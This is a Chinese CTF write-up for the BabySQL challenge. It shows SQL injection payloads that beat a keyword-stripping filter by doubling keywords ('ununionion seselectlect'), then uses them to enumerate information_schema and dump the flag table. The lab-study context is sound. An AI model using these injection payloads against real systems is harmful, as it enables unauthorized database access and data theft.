自从前几次网站被日,我对我的网站做了严格的过滤,你们这些黑客死心吧!!!
![图片[1]-[极客大挑战 2019]BabySQL – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/04/image-45.png)
尝试登录 admin'# ,登录成功,但相较于以前做的那个sql题,这个flag铁定错的
![[极客大挑战 2019]LoveSQL - buu刷题记录-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/04/image-32-1024x546.png)
2022年4月14日 15:39Your password is 'fd7055ec3060d96f366f2576620868cc'尝试万能密码 admin' or 1=1#,报错,猜测是关键词拦截了,经过一番测试 select,and,or,from,by都被过滤了
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1#' and password='123456'' at line 1经过双写之后,成功绕过
admin' oorr 1=1#然后就是那些语句一路高歌猛进就好
admin' oorrder bbyy 4#
admin' oorrder bbyy 3#
-1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
-1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#
-1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
-1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#![图片[2]-[极客大挑战 2019]BabySQL – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/04/image-46-1024x270.png)
最终flag为flag{6412beef-25f2-464f-adbf-536b39b50721}
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
请登录后查看评论内容